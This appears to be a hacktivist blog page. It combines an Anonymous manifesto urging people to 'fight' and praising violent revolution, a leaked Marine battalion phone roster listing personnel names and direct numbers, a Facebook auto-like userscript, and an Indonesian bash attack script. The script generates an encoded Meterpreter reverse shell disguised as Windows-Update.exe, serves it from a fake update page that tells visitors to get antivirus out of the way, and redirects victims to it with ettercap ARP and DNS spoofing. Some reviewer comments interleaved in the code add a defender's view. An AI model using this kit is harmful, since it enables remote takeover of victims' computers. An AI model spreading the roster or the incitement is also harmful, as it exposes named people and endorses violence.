The Internet is not a free place. It is rife with censorship, consumerism, and bigots functioning as over-sized corporations. In nations such as China, Vietnam, Russia, and many Arab countries, the Internet is heavily censored and often looked upon as a danger to national security. The propaganda must stop. Corporations, governments, bigots, censors, we’ve had enough! The time to stand down is now! This autocracy must end. Ever since the Arab Spring of two years ago, the Middle East has been torn by war, both civil and international. The ideals of freedom and liberty have long been lost in the smell of gunpowder and the blast of guns. And yet, even with these uprisings, in many of these countries the Internet remains heavily censored and monitored. The Great Firewall of China still stands as tall as ever. Many of the citizens of these countries do not even realize their freedoms are being taken from them, as autocracy is all they have ever known. If we believe in humanity, if we believe in freedom, in liberty, it is our inalienable duty to help the oppressed. Anonymous is not weak. Yes, we have lost many to arrests, but many still lurk in the shadows, waiting for the moment to strike. That moment is now! Wake up! Fight! The time will come when this fight is no longer ours, but that day is not this day. And until that day, we will fight or we will die trying, for freedom is our inalienable right. Stay strong my friends.

In time do I return

Greetings Anonymous,

For some time I have been away, and to tell you the truth, I had given up hope. I had given up hope that we could rise up and be something greater than ourselves. But, while my hope remains small, I have realized that a new generation of anonymous has arisen. So, to the soldiers of yesterday, let this be a swift wake-up call. Let us act now, for if we do not, time will surely turn our fate against us. Do not let these children make a mockery of us, fight! And stay strong.

1st Battalion 25th Marines Phone Roster

1st Battalion 25th Marines Phone Roster

DIAL 9 TO GET AN OUTSIDE LINE
DIAL 8 FOR DSN CALLS, LOCAL DSN PREFIX IS 256

SECTION/BILLET NAME ROOM TEL NUMBER TYPE
BATTALION
I&I LTCOL NEIL 114 978-796-2825
BN CO LTCOL OLEARY 113 978-798-2957
BN XO LTCOL KREIDER 115 978-796-2830
BN CHAPALIN LT GORMAN 111 978-796-2799
PWST MAJ KENSELLA 202
I&I SGTMAJ SGTMAJ WELLS 110 978-796-2827
BN SGTMAJ SGTMAJ TOMELLERI 102 978-796-2732
FRO DANIELLE SABOURIN 112 978-796-2753
S-1
S-1 CHIEF MSGT SORNIG 103 978-796-2828
S-1 ADJUTANT WO GARCIA 103 978-796-2797
S-1 ADMIN CHIEF SGT SMITH 106 978-796-2848
S-1 ADMIN SGT NIVAR 106 978-796-2754
S-1 ADMIN SGT DELEON 106 978-796-2836
S-1 ADMIN SGT RADCLIFFE 106 978-796-2955
CAREER PLANNER SSGT COCHRAN 109 978-796-2732
S-1 FAX MACHINE ADMIN FAX 106 978-796-2847 FAX
S-2
S-2 CPL MOFFETT 214 978-796-2959
S-3
S-3 133 978-796-2756
GUNNER GUNNER NOEL 133 978-796-2733
S-3 CHIEF/OPS MSGT DERVIN 135 978-796-2831
S-3 ASSISTANT CHIEF/OPS SSGT RITCHIE 135 978-796-3106
S-3 SCHOOLS/AMMO SSGT RITCHIE 135 978-796-3106
S-3 SCHOOLS/AMMO CPL LASCELLES 135 978-796-3106
S-4
S-4 CAPT WARAKSA 147 978-796-2745
S-4 CHIEF GYSGT SANDS 135 978-796-2817
S-4 EMBARK CHIEF SGT SCHIBNER 135 978-796-2820
S-4 MMC SGT MENDES 135 978-796-2820
S-4 ARMORY CHIEF (BN) SGT GILLEY 135 978-796-2820
S-4 SUPPLY NCO CPL NEWSOME 135 978-796-2817
S-4 MOTOR T CHIEF GYSGT NOWOSIELSKI MOTOR POOL 978-796-2674
S-4 MEDICAL HMC SANDERS 129 978-796-2748
S-4 FAX MEDICAL FAX 129 978-796-2833 FAX
SITE SUPPORT
S-4 SITE SUPPLY ADMIN CHIEF SGT CHAN 143 978-796-2757
S-4 WAREHOUSE CHIEF SGT CARDIN 143 978-796-2730
S-4 DASF NCO SGT VELA 143 978-796-2730
S-4 MMC SGT MORIN 143 978-796-2757
S-4 ARMORY (H&S) SGT GEORGE 134B 978-796-2804
S-4 ARMORY (WPNS) SGT MONAHAN 134B 978-796-2804
S-6
S-6 CHIEF GYSGT MORAN 146 978-796-2842
S-6 MAINTENANCE CHIEF SSGT JONES 146 978-796-2802
S-6 DATA CHIEF SGT ROLAND 146 978-796-2734
H&S COMPANY
I&I MAJ DOUGLAS 204 978-796-2811
COMPANY CO CAPT CUNNINGHAM 203B 978-796-3977
I&I 1STSGT 1STSGT NEWCOMB 203C 978-796-2731
COMPANY 1STSGT 203B 978-796-3977
COMPANY TRAINING CHIEF SSGT LEBLANC, A. 203B 978-796-3977
COMPANY GYSGT SSGT FELICIANO 203B 978-796-3977
WPNS COMPANY
I&I MAJ DOUGLAS 204 978-796-2811
COMPANY CO MAJ STOFFOLANO 207 978-796-2845
I&I 1STSGT 1STSGT NEWCOMB 203C 978-796-2731
COMPANY 1STSGT 1STSGT SHEINKIN 207 978-796-2845
COMPANY TRAINING CHIEF GYSGT MARTIN 207 978-796-2845
COMPANY ASST. TRAINING CHIEF 207 978-796-2845
OTHER NUMBERS
WOUNDED WARRIORS HMC SANDERS 129 978-796-2748
UNIT VOTING OFFICER SSGT COCHRAN 109 978-796-2732
ATFP
INTEL OVERSIGHT
SECURITY MANAGER GYSGT MORAN
ASST. SECURITY MANAGER
UVA SSGT COCHRAN 109 978-796-2732
EOR GYSGT MORAN 203A 978-796-2842
SACO GYSGT MARTIN 207 978-796-2845
PRIVACY ACT MSGT SORNIG 103 978-796-2828
EDUCATION OFFICER 203A 978-796-2842
SAFETY MANAGER
HAZMAT MANAGER SGT SCHIBNER 135 978-796-2820
CONFERENCE ROOM 116 978-796-2841
CLASS ROOM 978-796-2841

Easy Firewall Pass

  1. !/bin/bash
  2.  
  3. #Simple Bypass Firewall ( Easy metasploit + dns spoofing etc )
  4.  
  5. #Created By Dabllink, Royal, Trolpol, Trolloll, TopsToGod…
  6.  
  7. #save this file @ root
  8.  
  9. #Thanks to :
  10.  
  11. #p0zh1e,SoNz,BeraagaZZS, haryo aka autorun.inf, Syndrom2211, SutuL , Ihsan , all lost-c0de & CBF crew….
  12.  
  13. #special thanks to : Master Blusp10it & Red-Dragon..
  14.  
  15. clear
  16.  
  17. apt-get install figlet
  18.  
  19. clear
  20.  
  21. echo “#################################################”
  22.  
  23. figlet Dabllink
  24.  
  25. echo “#################################################”
  26.  
  27. echo
  28.  
  29. echo -en “masukan ip anda : “
  30.  
  31. read ip
  32.  
  33. echo
  34.  
  35. echo -en “masukan port anda: “
  36.  
  37. read port
  38.  
  39. echo
  40.  
  41. echo “Tunggu , sedang di proses…..”
  42. msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /var/www/Windows-Update.exe
  43. clear
  44. panggilmsfcli() {
  45. msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$port LHOST=$ip E
  46. }
  47.  
  48.  
  49. gnome() {
  50.  
  51. echo ‘#!/bin/bash
  52. cetaklagi() {
  53. echo ” dns spoofing :)”
  54. echo
  55. echo -en ” masukan interfaces anda : “
  56. read interfaces
  57. echo -en ” apa anda sudah punya target ? (y/n) “
  58. read pilihan
  59. if [ $pilihan == “y” ]; then
  60. echo -en ” masukan ip korban : “
  61. read ipkorban
  62. echo -en ” masukan ip gateway : “
  63. read ipgateway
  64. ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/
  65. elif [ $pilihan == “n” ]; then
  66. ettercap -Tqi $interfaces -P dns_spoof -M arp // //
  67. else
  68. cetaklagi
  69. fi
  70. exec bash
  71. }
  72. cetaklagi’ > /root/spoof.sh
  73. clear
  74. echo “Sedang membuka terminal baru”
  75. sleep 2
  76. chmod +x spoof.sh
  77. gnome-terminal –command=”./spoof.sh”
  78. echo “exploit…………………………………….. “
  79. panggilmsfcli
  80. }
  81.  
  82. kde() {
  83. echo ‘#!/bin/bash
  84. cetaklagi() {
  85. echo ” dns spoofing :)”
  86. echo
  87. echo -en ” masukan interfaces anda : “
  88. read interfaces
  89. echo -en ” apa anda sudah punya target ? (y/n) “
  90. read pilihan
  91. if [ $pilihan == “y” ]; then
  92. echo -en ” masukan ip korban : “
  93. read ipkorban
  94. echo -en ” masukan ip gateway : “
  95. read ipgateway
  96. ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/
  97. elif [ $pilihan == “n” ]; then
  98. ettercap -Tqi $interfaces -P dns_spoof -M arp // //
  99. else
  100. cetaklagi
  101. fi
  102. exec bash
  103. }
  104. cetaklagi’ > /root/spoof.sh
  105. clear
  106. echo “Sedang membuka terminal baru”
  107. sleep 2
  108. chmod +x spoof.sh
  109. konsole –noclose -e ./spoof.sh
  110. echo “exploit…………………………………….. “
  111. panggilmsfcli
  112.  
  113. }
  114.  
  115. clear
  # NOTE(review): this run starts Apache, deletes the existing
  # /var/www/index.html and writes a replacement page titled "Warning!!!" whose
  # only control is a "Download Update" button that opens /Windows-Update.exe.
  # The Indonesian page text tells the visitor to update Windows to keep
  # browsing and to make sure nothing, antivirus included, interferes.
  # Defender's view: a browser page served by a host on the local network that
  # offers a Windows update as an .exe download and asks for antivirus to be
  # out of the way is a social-engineering lure. Application allow-listing and
  # blocking executable downloads from uncategorised or internal HTTP hosts
  # address the delivery step.
  116. /etc/init.d/apache2 start
  117. clear
  118.  
  119. rm /var/www/index.html
  120. echo ‘<html>
  121. <head>
  122. <title>Warning!!!</title>
  123. </head>
  124. <body>
  125. <p align=”center”><u><b>Perhatian:</u></b>Update Windows anda jika ingin tetap melanjutkan browsing.<br>Pastikan tidak ada yang menghambat saat update berjalan, <br>seperti Antivirus</p>
  126. <p align=”center”>
  127. <input align=”center” type=”button” name=”Button” value=”Download Update” onClick=”window.open’ >> /var/www/index.html
  128. echo “(‘/Windows-Update.exe’,’download’);” >> /var/www/index.html
  129. echo ‘return false;”></p>
  130. </body>
  131. </html>’ >> /var/www/index.html
  # NOTE(review): cetak asks which of two etter.dns locations is installed and
  # overwrites that file with the single wildcard record "* A $ip", where $ip
  # is the address read at the start of the script. Any other answer clears the
  # screen and asks again by calling itself.
  # Defender's view: on the network this shows up as unrelated hostnames all
  # resolving to one local address, alongside the ARP cache changes caused by
  # the "-M arp" mode used in the spoof.sh text above. Dynamic ARP inspection
  # with DHCP snooping on access switches, and TLS with certificate validation
  # on clients, limit what such a redirect can achieve.
  133. cetak() {
  134. echo “1. /usr/local/share/ettercap/etter.dns”
  135. echo
  136. echo “2. /usr/share/ettercap/etter.dns “
  137. echo
  138. echo -en “Masukan tempat etter.dns anda berada (1/2): “
  139. read pilihan
  140. if [ $pilihan == “1” ]; then
  141. echo “* A $ip” > /usr/local/share/ettercap/etter.dns  
  142. elif [ $pilihan == “2” ]; then
  143. echo “* A $ip” > /usr/share/ettercap/etter.dns
  144. else
  145. clear
  146. cetak
  147. fi
  148. }
  149. cetak
  150. clear
  151.  
  152.  
  153. echo -en “Anda menggunakan kde/gnome? “
  154. read pilihanzz
  155. $pilihanzz

Spreading the Gospel of Anon

The best way to get the word out about hacktivism is through social networks – and the most popular of these is by far Facebook. The question, then, is how to make a Facebook page more popular. Facebook blocks the use of automated scripts and deletes fake accounts rather quickly – so that wouldn’t work. However, when you comment on other people’s posts and like other people’s pages, your name spreads quickly and shows up often. This seems to be the best way to get your name out on Facebook. But, then again, who has the time to surf Facebook and manually like and comment on so many pages? That is why I have coded this script. It automates the process of liking and commenting so that anonymous accounts can spread wider and farther than ever before. Remember: when peaceful revolution becomes impossible – violent revolution becomes inevitable. Stay strong, my friends, stay strong!

 

// @name           Facebook AutoLike
// @namespace      AutoLike
// @description    Automaticly like facebook statuses and comments
// @include        http://www.facebook.com/*
// ==/UserScript==

// ==Credits==
// Injects a fixed-position box near the bottom-left corner of the page holding
// a link to the site-relative path /muhdfadzli95. It adds no functionality.
// `body` and `div` are assigned without var/let, so they are implicit globals
// that every later section of this script overwrites.
// NOTE(review): the @include rule above runs this on every page under
// http://www.facebook.com/, so the injected link appears on all of them; read
// what a userscript injects before installing it.
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+122px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"/muhdfadzli95\">Leaked by iEatNoodlez </a>"
	
	body.appendChild(div);
}
// ==============
// ==Expand==
// Adds an "Expand comments" link and defines AutoExpand(), which clicks every
// <input> whose name attribute is "view_all[1]".
// NOTE(review): the function is attached to unsafeWindow so that the
// javascript: href, which runs in the page's own context, can reach it.
// Greasemonkey documents unsafeWindow as a security risk: objects placed there
// are visible to the page's script. Registering a click listener on the
// injected link from inside the userscript avoids exposing anything.
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+102px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"JavaScript:AutoExpand()\">Expand comments</a>"
	
	body.appendChild(div);
	
	unsafeWindow.AutoExpand = function() {
	
		// buttons, i and myClass are implicit globals (no var/let).
		buttons = document.getElementsByTagName("input");
		for(i = 0; i < buttons.length; i++) {
			myClass = buttons[i].getAttribute("class");
			// indexOf("") is 0 for any string, so this only filters out
			// elements that have no class attribute at all.
			if(myClass != null && myClass.indexOf("") >= 0)
				if(buttons[i].getAttribute("name") == "view_all[1]")
					buttons[i].click();
		}
		
	};
}
// ==============
// ==Statuses==
// Adds a "Like all statuses" link and defines AutoLike(), which clicks every
// <button> whose class contains "like_link" and whose name is "like".
// All matching buttons are clicked in one synchronous loop with no delay.
// NOTE(review): exposed through unsafeWindow so the javascript: href can call
// it; that also makes the function reachable from the page's own script.
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+72px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"JavaScript:AutoLike()\">Like all statuses</a>"
	
	body.appendChild(div);
	
	unsafeWindow.AutoLike = function() {
	
		// buttons, i and myClass are implicit globals (no var/let).
		buttons = document.getElementsByTagName("button");
		for(i = 0; i < buttons.length; i++) {
			myClass = buttons[i].getAttribute("class");
			if(myClass != null && myClass.indexOf("like_link") >= 0)
				if(buttons[i].getAttribute("name") == "like")
					buttons[i].click();
		}
		
	};
}
// ==============
// ==Unlike Statuses==
// Adds an "Unlike all statuses" link and defines AutoUnLike(), the inverse of
// the section above: it clicks every <button> whose class contains "like_link"
// and whose name is "unlike".
// NOTE(review): exposed through unsafeWindow so the javascript: href can call
// it; that also makes the function reachable from the page's own script.
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+52px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"JavaScript:AutoUnLike()\">Unlike all statuses</a>"
	
	body.appendChild(div);
	
	unsafeWindow.AutoUnLike = function() {
	
		// buttons, i and myClass are implicit globals (no var/let).
		buttons = document.getElementsByTagName("button");
		for(i = 0; i < buttons.length; i++) {
			myClass = buttons[i].getAttribute("class");
			if(myClass != null && myClass.indexOf("like_link") >= 0)
				if(buttons[i].getAttribute("name") == "unlike")
					buttons[i].click();
		}
		
	};
}
// ==============
// ==Comments==
// Adds a "Like all comments" link and defines AutoLikeComments(), which clicks
// every <button> whose title attribute is exactly "Like this comment".
// The match is on the English title text, so it depends on the interface
// language of the page.
// NOTE(review): exposed through unsafeWindow so the javascript: href can call
// it; that also makes the function reachable from the page's own script.
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+22px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"JavaScript:AutoLikeComments()\">Like all comments</a>"
	
	body.appendChild(div);
	
	unsafeWindow.AutoLikeComments = function() {
	
		// buttons, i and myClass are implicit globals (no var/let).
		buttons = document.getElementsByTagName("button");
		for(i = 0; i < buttons.length; i++) {
			myClass = buttons[i].getAttribute("class");
			// indexOf("") is 0 for any string, so this only filters out
			// buttons that have no class attribute at all.
			if(myClass != null && myClass.indexOf("") >= 0)
				if(buttons[i].getAttribute("title") == "Like this comment")
					buttons[i].click();			
															
		}
		
	};
}
// ==============
// ==Unlike Comments==
// Adds an "Unlike all comments" link and defines AutoUnLikeComments(), which
// clicks every <button> whose title attribute is exactly "Unlike this comment".
// NOTE(review): exposed through unsafeWindow so the javascript: href can call
// it; that also makes the function reachable from the page's own script.
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+2px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"JavaScript:AutoUnLikeComments()\">Unlike all comments</a>"
	
	body.appendChild(div);
	
	unsafeWindow.AutoUnLikeComments = function() {
	
		// buttons, i and myClass are implicit globals (no var/let).
		buttons = document.getElementsByTagName("button");
		for(i = 0; i < buttons.length; i++) {
			myClass = buttons[i].getAttribute("class");
			// indexOf("") is 0 for any string, so this only filters out
			// buttons that have no class attribute at all.
			if(myClass != null && myClass.indexOf("") >= 0)
				if(buttons[i].getAttribute("title") == "Unlike this comment")
					buttons[i].click();
		}
		
	};
}
// ==============